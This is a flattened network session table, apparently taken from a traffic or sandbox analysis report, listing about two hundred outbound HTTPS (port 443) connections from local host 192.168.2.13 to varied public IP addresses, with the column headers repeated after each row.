                                                  14955192.168.2.135193669.8.221.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14956192.168.2.136055263.92.58.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14957192.168.2.134812638.132.20.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14958192.168.2.1350902191.190.52.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14959192.168.2.1349066100.189.106.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14960192.168.2.1345938209.197.194.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14961192.168.2.134293642.106.52.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14962192.168.2.1336402146.48.32.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14963192.168.2.1355644163.190.76.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14964192.168.2.135666844.195.41.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14965192.168.2.1339872134.13.155.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14966192.168.2.133280682.19.38.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14967192.168.2.1338484121.223.229.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14968192.168.2.134357265.149.127.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14969192.168.2.1359324133.82.212.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14970192.168.2.1352354191.235.117.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14971192.168.2.1335848209.69.54.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14972192.168.2.133741652.147.39.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14973192.168.2.134004042.47.255.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14974192.168.2.1334346200.104.35.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14975192.168.2.1336480158.92.214.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14976192.168.2.1333134207.18.147.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14977192.168.2.1354664132.27.237.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14978192.168.2.133530281.0.191.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14979192.168.2.135358287.239.75.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14980192.168.2.134409866.220.221.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14981192.168.2.133769260.154.240.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14982192.168.2.1336140124.173.53.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14983192.168.2.1350940169.53.246.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14984192.168.2.1349326193.249.238.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14985192.168.2.133691436.205.88.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14986192.168.2.1356782132.12.42.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14987192.168.2.136028419.153.243.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14988192.168.2.1338922223.195.34.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14989192.168.2.135191265.77.186.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14990192.168.2.1332956184.249.157.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14991192.168.2.1339064210.75.9.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14992192.168.2.1360216223.4.57.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14993192.168.2.1359446186.246.161.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14994192.168.2.1340720137.68.83.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14995192.168.2.1354970170.68.251.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14996192.168.2.1337806118.179.102.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14997192.168.2.1351146212.50.90.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14998192.168.2.135498259.172.108.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14999192.168.2.134050279.157.219.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15000192.168.2.1348498185.253.209.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15001192.168.2.1345932205.90.236.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15002192.168.2.1358828184.85.159.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15003192.168.2.135984844.254.142.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15004192.168.2.1340818177.149.193.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15005192.168.2.135699839.21.174.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15006192.168.2.1335142147.133.206.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15007192.168.2.1346006170.115.190.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15008192.168.2.1341888103.106.139.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15009192.168.2.135581047.163.14.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15010192.168.2.1351556139.235.192.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15011192.168.2.1359368198.208.23.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15012192.168.2.1339858125.240.216.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15013192.168.2.1348346135.69.54.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15014192.168.2.1337584155.70.51.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15015192.168.2.1350432213.246.33.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15016192.168.2.1348878121.135.27.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15017192.168.2.135320895.231.50.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15018192.168.2.1334906136.53.57.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15019192.168.2.1360458186.97.35.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15020192.168.2.1332784111.50.73.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15021192.168.2.135890493.218.243.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15022192.168.2.1342928198.232.193.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15023192.168.2.1353392145.246.219.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15024192.168.2.133754668.137.184.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15025192.168.2.133434854.66.136.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15026192.168.2.133842282.38.220.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15027192.168.2.135943673.82.125.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15028192.168.2.1358652218.223.249.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15029192.168.2.1353890112.208.100.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15030192.168.2.1335252145.40.29.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15031192.168.2.134946468.138.183.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15032192.168.2.135651038.172.67.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15033192.168.2.134734049.158.128.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15034192.168.2.1334350117.75.17.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15035192.168.2.135968473.200.210.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15036192.168.2.134679044.212.37.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15037192.168.2.1346416168.218.44.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15038192.168.2.1338502168.209.197.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15039192.168.2.1340416187.227.196.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15040192.168.2.1339236172.66.246.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15041192.168.2.1341134147.253.243.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15042192.168.2.133813089.39.115.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15043192.168.2.134391418.54.37.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15044192.168.2.1338924136.144.161.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15045192.168.2.1355122209.164.25.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15046192.168.2.1341078120.215.181.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15047192.168.2.1354270115.141.216.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15048192.168.2.133587612.113.227.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15049192.168.2.135292289.104.208.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15050192.168.2.1356822167.32.16.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15051192.168.2.1353266136.183.171.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15052192.168.2.135982023.231.178.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15053192.168.2.134734273.113.35.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15054192.168.2.1348210107.34.128.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15055192.168.2.133670282.85.237.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15056192.168.2.134516447.165.136.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15057192.168.2.13375782.55.21.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15058192.168.2.1333892117.166.203.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15059192.168.2.134225439.149.42.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15060192.168.2.133813675.26.165.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15061192.168.2.1340852185.84.161.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15062192.168.2.1346676138.41.106.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15063192.168.2.134743099.153.122.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15064192.168.2.134280253.201.50.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15065192.168.2.1348328124.102.226.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15066192.168.2.134755814.245.19.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15067192.168.2.1351572166.143.16.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15068192.168.2.1354272164.225.233.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15069192.168.2.1357856120.109.45.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15070192.168.2.1359814165.203.123.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15071192.168.2.133285483.59.171.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15072192.168.2.13447904.96.15.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15073192.168.2.1337794204.96.130.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15074192.168.2.1346854158.185.88.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15075192.168.2.135688639.105.51.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15076192.168.2.134237837.176.11.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15077192.168.2.135231879.154.249.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15078192.168.2.1358392121.132.72.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15079192.168.2.1338488151.202.59.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15080192.168.2.133546873.116.233.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15081192.168.2.134858078.208.101.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15082192.168.2.1332928161.49.84.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15083192.168.2.1351042141.105.66.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15084192.168.2.134175623.9.125.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15085192.168.2.1333734167.249.22.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15086192.168.2.1337158177.202.129.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15087192.168.2.134890271.207.55.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15088192.168.2.1351074170.37.45.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15089192.168.2.133637042.91.186.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15090192.168.2.1357112218.19.232.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15091192.168.2.1354690155.108.74.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15092192.168.2.1360352193.18.122.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15093192.168.2.134897681.37.33.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15094192.168.2.135796246.139.59.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15095192.168.2.133503665.41.74.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15096192.168.2.1356662183.31.126.21443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15097192.168.2.135116265.113.92.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15098192.168.2.1347550128.119.102.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15099192.168.2.134440018.124.69.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15100192.168.2.135231242.39.74.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15101192.168.2.1340938152.44.205.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15102192.168.2.133729648.125.65.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15103192.168.2.1336116136.187.117.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15104192.168.2.133495275.92.88.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15105192.168.2.134131857.236.18.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15106192.168.2.133336641.128.144.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15107192.168.2.1350872194.190.157.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15108192.168.2.136048250.2.148.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15109192.168.2.133724412.247.157.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15110192.168.2.13375521.126.15.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15111192.168.2.1339354126.119.222.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15112192.168.2.133772842.141.34.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15113192.168.2.1349566123.141.46.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15114192.168.2.1345468120.119.116.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15115192.168.2.135914068.56.247.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15116192.168.2.133825814.186.211.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15117192.168.2.135301674.106.44.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15118192.168.2.1357510175.94.97.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15119192.168.2.1345526179.123.150.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15120192.168.2.133350280.206.34.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15121192.168.2.1347996223.82.90.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15122192.168.2.1333318104.173.183.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15123192.168.2.133297440.221.155.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15124192.168.2.133777212.58.80.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15125192.168.2.1357418129.171.48.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15126192.168.2.133521074.15.143.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15127192.168.2.1355372221.67.161.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15128192.168.2.1351124110.8.22.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15129192.168.2.13439968.35.223.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15130192.168.2.1341844150.148.16.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15131192.168.2.1357366121.182.197.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15132192.168.2.1344234173.29.143.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15133192.168.2.1349526187.252.216.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15134192.168.2.135204289.220.240.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15135192.168.2.134700273.143.78.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15136192.168.2.1344406115.29.48.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15137192.168.2.1351648118.208.109.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15138192.168.2.136048638.235.141.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15139192.168.2.135647218.196.165.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15140192.168.2.1339488178.165.2.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15141192.168.2.1349416188.59.242.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15142192.168.2.1358240115.136.137.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15143192.168.2.1337616203.138.168.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15144192.168.2.1343796223.218.135.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15145192.168.2.135095040.209.33.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15146192.168.2.1339684193.251.179.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15147192.168.2.133697693.178.251.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15148192.168.2.1339566179.211.153.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15149192.168.2.1348466131.138.111.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15150192.168.2.133862649.249.31.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15151192.168.2.136094443.27.96.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15152192.168.2.1334554166.92.214.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15153192.168.2.134071442.169.112.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15154192.168.2.1357906108.50.100.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15155192.168.2.1343778209.72.39.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15156192.168.2.1347150137.102.50.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15157192.168.2.1350250161.80.85.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15158192.168.2.1360618121.22.111.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15159192.168.2.134838488.161.153.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15160192.168.2.1349742140.14.118.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15161192.168.2.133620680.180.146.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15162192.168.2.1341034141.107.75.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15163192.168.2.1347188145.235.252.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15164192.168.2.1338624168.53.111.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15165192.168.2.133316612.227.30.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15166192.168.2.1350638178.171.105.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15167192.168.2.1359530100.130.241.224443
